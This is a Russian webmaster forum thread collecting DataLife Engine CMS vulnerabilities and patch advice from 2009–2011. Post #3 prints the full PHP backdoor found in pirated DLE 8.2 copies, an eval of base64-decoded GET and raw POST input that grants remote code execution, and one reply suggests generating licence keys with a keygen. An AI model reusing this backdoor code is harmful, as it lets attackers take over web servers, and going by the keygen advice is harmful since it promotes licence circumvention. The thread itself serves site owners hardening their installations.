|  |  | 
| 
 | ||||||||
| Инструкции, модификации и статьи для DLE Сборник инструкции, модов и статей по движку DataLife Engine | 
|  | 
|  | Опции темы | Поиск в этой теме | 
|  15.11.2009, 13:44
			
			
Вверх | #1 | |||
| Коварный тип    
 |  Уязвимости в DLE (Затыкаем дырки) Я думаю что вопрос безопасности в скрипте DLE довольно актуален, т.к. движок имеет очень широкое распространение. Тема создана для вэб -мастеров, а не для засрацев, которые используют чужие ошибки. | |||
|   | ||||
| Cказали cпасибо: | 
|  15.11.2009, 13:53
			
			
Вверх | #2 | ||||
| Коварный тип    
 |  Уязвимость DataLife Engine 8.2 Уязвимость DataLife Engine 8.2 Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля. Степень опасности: Очень высокая Злоумышленник может получить логин и пароль через модуль восстановления пароля. Как получают пароль: 
 Для решения проблемы администраторам рекомендуется обновить скрипт до 8.3. Следует так же учесть что в версии 8.3 изменяются некоторые шаблоны. Все изменения в удобном виде можно просмотреть на официальном сайте ВОТ ТУТ. Для тех кто не хочет обновлять версию скрипта официальный производитель предлагает скачать патч. Скачать его можно ВОТ ТУТ или из вложения к этому сообщению. | ||||
|   | |||||
|  15.11.2009, 13:54
			
			
Вверх | #3 | |||
| Web Master    
 |   DLE 8.2 нулл от мид-тим весь в дырках..  1) Проблема: Недостаточная фильтрация входящих данных в модуле восстановления пароля. Ошибка в версии: только 8.2, версии ниже 8.2, а также актуальная версия 8.3 данной уязвимости не подвержены Степень опасности: Очень высокая Замените файл => dle82_path.zip 2) На днях появилась информация, что нуленные движки (скачанные c dle.in.ua, с других хз) dle8.2 содержат бэкдор в файле engine/ajax/updates.php eval() через $_POST. Код: if($_GET['wert']==''){ 
require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; 
$config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; 
@header("HTTP/1.0 200 OK"); 
@header("HTTP/1.1 200 OK"); 
@header("Cache-Control: no-cache, must-revalidate, max-age=0"); 
@header("Expires: 0"); 
@header("Pragma: no-cache"); 
@header("Content-type: text/css; charset=".$config['charset']); 
$data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); 
if (!strlen($data)) echo $lang['no_update']; else echo $data; 
}else{ 
$file=(ROOT_DIR."/engine/classes/mysql.class.php"); 
if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/dbconfig.php"); 
if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} 
$file=(ROOT_DIR."/engine/data/config.php"); 
if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} 
eval(base64_decode($_GET['user_id'])); 
echo <<<HTML 
<HTML><body><form action="" method="post"> 
<center><textarea name="text" rows="10" cols="100"></textarea> 
<br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML> 
HTML; 
if($_POST['text']!=''){eval(stripcslashes($_POST['text'])); 
}} | |||
|   | ||||
|  16.11.2009, 03:07
			
			
Вверх | #4 | ||||
| Fedoraвод    
 |   Эх серега, такую дырку спалил, яж те по секрету, а ты всему свету (шутка конечно) Но есть у меня еще парочка секретов, так что, не советую серьёзные проекты хостить на дле, уж слишком много в них дырок. Serberg: Да уж, секрет ))) Просто внимания на эту писанину не обратил, пока не увидел что у меня та же ботва ). Естати, вот еще набор уязвимостей: 
 | ||||
| Последний раз редактировалось Serberg; 16.11.2009 в 16:26.. | |||||
|   | |||||
| Cказали cпасибо: | 
|  16.11.2009, 12:37
			
			
Вверх | #5 | |||
| .:V.I.P.:.    
 |   Как вариант взять лицензионный скрипт DLE, мне дал его один знакомый. А ключ с генерируете генератором ключей.    Скачать | |||
| Последний раз редактировалось Serberg; 16.11.2009 в 16:30.. | ||||
|   | ||||
| Cказали cпасибо: | 
|  05.12.2009, 21:27
			
			
Вверх | #6 | |||
| Новичок    
 |   Даже если "плохому дяде" удастся получить доступ к админке, шелл залить не получится, т.к. в папке загрузки файлов лежит .htaccess который не даёт работать php(и не только). Шелл получится залить если установлен DLE Forum. Это так, для заметки. | |||
|   | ||||
| Cказали cпасибо: | 
|  07.02.2011, 11:51
			
			
Вверх | #7 | |||
| ::.V.I.P.::    
 |  Недостаточная фильтрация входящих данных Недостаточная фильтрация входящих данных Ошибка в версии: 9.0 и все более ранние версии Степень опасности: Высокая Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите: PHP код: 
			PHP код: 
			PHP код: 
			PHP код: 
			Источник: dle-news.ru | |||
| Последний раз редактировалось Serberg; 16.02.2011 в 19:44.. | ||||
|   | ||||
|  16.02.2011, 19:46
			
			
Вверх | #8 | |||
| Коварный тип    
 |  Недостаточная фильтрация входящих данных Недостаточная фильтрация входящих данных Проблема: Пользователю которому разрешена загрузка файлов на сервер (не картинок), может выйти за пределы разрешенной папки загрузки, а если он имеет администраторский аккаунт на сайте, то и повредить данные скрипта. Ошибка в версии: 7.x - 8.5 Степень опасности: Средняя (Высокая при наличии администраторского аккаунта на сайте) Для исправления откройте файл engine/inc/files.php и найдите: PHP код: 
			PHP код: 
			PHP код: 
			PHP код: 
			 | |||
|   | ||||
|  | 
| Метки | 
| shell dle, дыры в dle, уязвимости | 
| 
 | 
 | 
|  Похожие темы | ||||
| Тема | Автор | Раздел | Ответов | Последнее сообщение | 
| Уязвимости форумов Vbulletin | shadowvlad | vBulletin 3.х | 2 | 26.02.2009 14:17 |